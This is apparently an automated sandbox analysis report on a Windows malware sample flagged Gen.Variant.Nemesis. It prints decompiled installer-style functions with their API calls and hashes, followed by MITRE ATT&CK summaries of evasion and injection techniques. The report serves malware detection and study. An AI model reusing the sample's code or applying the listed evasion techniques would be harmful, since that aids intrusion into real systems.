Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
Instruction ID: 33d5b4b63083ad43afaa288e046e1f08ed21b79f7f5b9eb46acb358563388364
Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
Instruction Fuzzy Hash: 86D05E31101924AAC121BB549C04DDF63ACAE86304342087AF541B20A5C77C296286FD

Uniqueness

Uniqueness Score: -1.00%

Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402E5D(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x422a00; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x434ef0;
						if(_t2 >  *0x434ef0) {
							_t3 = CreateDialogParamW( *0x434ee0, 0x6f, 0, E00402DD7, 0);
							 *0x422a00 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406698(0);
					}
				} else {
					_t6 =  *0x422a00; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x422a00 = 0;
					return _t6;
				}
			}

0x00402e64
0x00402e7e
0x00402e84
0x00402e8e
0x00402e94
0x00402e9a
0x00402eab
0x00402eb4
0x00000000
0x00402eb9
0x00402ec0
0x00402e86
0x00402e8d
0x00402e8d
0x00402e66
0x00402e66
0x00402e6d
0x00402e70
0x00402e70
0x00402e76
0x00402e7d
0x00402e7d

APIs

DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
GetTickCount.KERNEL32 ref: 00402E8E
CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
Instruction ID: fb236cf74f4011b48551144809540ae7a3d608603197ef92b98d1837a73ee17d
Opcode Fuzzy Hash: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
Instruction Fuzzy Hash: BDF05E30941620EBC6316B20FF0DA9B7B69BB44B42745497AF441B19E8C7B44881CBDC

Uniqueness

Uniqueness Score: -1.00%

Function 0040525A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040525A(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42d234 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42d234 = _t16;
							E00404C30();
						}
						L11:
						return CallWindowProcW( *0x42d23c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404BB0(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404263(0x413);
				return 0;
			}

0x0040525e
0x00405268
0x00405284
0x004052a6
0x004052a9
0x004052af
0x004052b9
0x004052ba
0x004052bc
0x004052c2
0x004052c2
0x004052cc
0x00000000
0x004052da
0x00405291
0x004052c9
0x004052c9
0x00000000
0x004052c9
0x0040529d
0x0040529f
0x00000000
0x0040529f
0x0040526e
0x00000000
0x00000000
0x00405275
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00405289
CallWindowProcW.USER32(?,?,?,?), ref: 004052DA

Part of subcall function 00404263: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404275

Strings

, xrefs: 0040526A

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
Instruction ID: e35359e86d41fb5d6968ee62a371e6abd11f03428b82ac61abb391d392e116c6
Opcode Fuzzy Hash: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
Instruction Fuzzy Hash: 0E017131510609ABDF209F51DD84A5B3A25EF84754F5000BBFA04751D1C77A9C929E6E

Uniqueness

Uniqueness Score: -1.00%

Function 00406150 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00406150(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004060EF(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x0040615e
0x00406160
0x00406178
0x0040617d
0x00406182
0x004061c0
0x004061c0
0x00406184
0x00406196
0x004061a1
0x004061a7
0x004061b2
0x00000000
0x00000000
0x004061b2
0x004061c6

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,004063C4,80000002), ref: 00406196
RegCloseKey.ADVAPI32(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll), ref: 004061A1

Strings

Call, xrefs: 00406157

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: f215a2074a9fc440f4a1777f7a3a550b5582584351027f12a6dd0badbbe4df1b
Instruction ID: ccae29ee16f81b62eed190a0e72f85d1395cd89474178e8bc9e2f9375c5b4726
Opcode Fuzzy Hash: f215a2074a9fc440f4a1777f7a3a550b5582584351027f12a6dd0badbbe4df1b
Instruction Fuzzy Hash: C7017172510209EADF21CF55CD05EDF3BA8EB54360F018035FD1596191D779D968CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004038FB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004038FB() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42b20c;
				_t3 = E004038E0(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42b20c =  *0x42b20c & 0x00000000;
				return _t3;
			}

0x004038fc
0x00403904
0x0040390b
0x0040390e
0x0040390e
0x00403910
0x00403915
0x0040391c
0x00403922
0x00403926
0x00403927
0x0040392f

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75523420,004038D3,004036E9,00000006,?,00000006,00000008,0000000A), ref: 00403915
GlobalFree.KERNEL32(?), ref: 0040391C

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040390D

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
Instruction ID: e66732d9f8c7dde22b06ec40e1a6716a7c13e86cf839674f34118547447e98ef
Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
Instruction Fuzzy Hash: 95E012739019209BC6215F55ED08B5E7B68AF58B22F05447AE9807B26087B45C929BD8

Uniqueness

Uniqueness Score: -1.00%

Function 00405B9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405B9F(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}

0x00405ba0
0x00405baa
0x00405bad
0x00405bb3
0x00405bb4
0x00405bb5
0x00405bbd
0x00000000
0x00000000
0x00000000
0x00405bbd
0x00405bbf
0x00405bc7

APIs

lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BA5
CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BB5

Strings

C:\Users\user\Desktop, xrefs: 00405B9F

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
Instruction ID: a8af4f0e04a9cb416ac945bb8770274a79718c16fb62e87aa8b604c5d62251ee
Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
Instruction Fuzzy Hash: D5D05EB24019209AD3126B08DC00DAF73A8EF5230074A48AAE841A6165D7B87D8186AC

Uniqueness

Uniqueness Score: -1.00%

Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100010E1(signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v0;
				void* _t17;
				signed int _t19;
				void* _t20;
				void* _t24;
				void* _t26;
				void* _t30;
				void* _t36;
				void* _t38;
				void* _t39;
				signed int _t41;
				void* _t42;
				void* _t51;
				void* _t52;
				signed short* _t54;
				void* _t56;
				void* _t59;
				void* _t61;

				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1, _t51, _t56);
				_t41 =  *0x1000406c +  *0x1000406c * 4 << 3;
				_t17 = E10001243();
				_v0 = _t17;
				_t52 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_t17);
				} else {
					do {
						_t19 =  *_t52 & 0x0000ffff;
						_t42 = 2;
						_t54 = _t52 + _t42;
						_t61 = _t19 - 0x6c;
						if(_t61 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t52 = _t54 + _t42;
								_t24 = E10001272(E100012BA(( *_t54 & 0x0000ffff) - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t26 = _t20 - _t42;
							if(_t26 == 0) {
								L10:
								_t52 =  &(_t54[1]);
								_t24 = E100012E1(( *_t54 & 0x0000ffff) - 0x30, E10001243());
								goto L13;
							}
							L7:
							if(_t26 == 1) {
								_t30 = GlobalAlloc(0x40, _t41 + 4);
								 *_t30 =  *0x10004040;
								 *0x10004040 = _t30;
								E10001563(_t30 + 4,  *0x10004074, _t41);
								_t59 = _t59 + 0xc;
							}
							goto L14;
						}
						if(_t61 == 0) {
							L17:
							_t33 =  *0x10004040;
							if( *0x10004040 != 0) {
								E10001563( *0x10004074, _t33 + 4, _t41);
								_t59 = _t59 + 0xc;
								_t36 =  *0x10004040;
								GlobalFree(_t36);
								 *0x10004040 =  *_t36;
							}
							goto L14;
						}
						_t38 = _t19 - 0x4c;
						if(_t38 == 0) {
							goto L17;
						}
						_t39 = _t38 - 4;
						if(_t39 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L12;
						}
						_t26 = _t39 - _t42;
						if(_t26 == 0) {
							 *_t54 =  *_t54 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t52 != 0);
					_t17 = _v0;
					goto L16;
				}
			}

0x100010e6
0x100010f0
0x100010ff
0x1000110e
0x10001119
0x1000111c
0x1000112b
0x1000112f
0x10001131
0x100011d8
0x100011de
0x10001137
0x10001138
0x10001138
0x1000113d
0x1000113e
0x10001140
0x10001143
0x1000120d
0x10001210
0x100011b0
0x100011b6
0x100011bf
0x100011c4
0x100011c7
0x00000000
0x100011c7
0x10001212
0x10001214
0x10001196
0x1000119d
0x100011a5
0x00000000
0x100011a5
0x10001161
0x10001162
0x1000116a
0x10001177
0x1000117f
0x10001188
0x1000118d
0x1000118d
0x00000000
0x10001162
0x10001149
0x100011df
0x100011df
0x100011e6
0x100011f3
0x100011f8
0x100011fb
0x10001203
0x10001205
0x10001205
0x00000000
0x100011e6
0x1000114f
0x10001152
0x00000000
0x00000000
0x10001158
0x1000115b
0x100011ac
0x00000000
0x100011ac
0x1000115d
0x1000115f
0x10001192
0x00000000
0x10001192
0x00000000
0x100011c9
0x100011c9
0x100011d3
0x00000000
0x100011d7

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
GlobalFree.KERNEL32(00000000), ref: 100011C7
GlobalFree.KERNEL32(00000000), ref: 100011D9
GlobalFree.KERNEL32(?), ref: 10001203

Memory Dump Source

Source File: 00000001.00000002.29266932000.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.29266891366.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.29266969679.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.29267005182.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765

Uniqueness

Uniqueness Score: -1.00%

Function 00405CD9 Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CD9(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405ce9
0x00405ceb
0x00405cee
0x00405d1a
0x00405cf3
0x00405cfc
0x00405d01
0x00405d0c
0x00405d0f
0x00405d2b
0x00405d11
0x00405d18
0x00000000
0x00405d18
0x00405d24
0x00405d28
0x00405d28
0x00405d22
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D01
CharNextA.USER32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D12
lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction ID: eb4b2eb4961b7d09ea4a34ed08b3b50e56f073c3670a6d3e208c08a45fec6953
Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction Fuzzy Hash: 10F0F631204918FFD7029FA4DD0499FBBA8EF16350B2580BAE840FB211D674DE01AB98

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
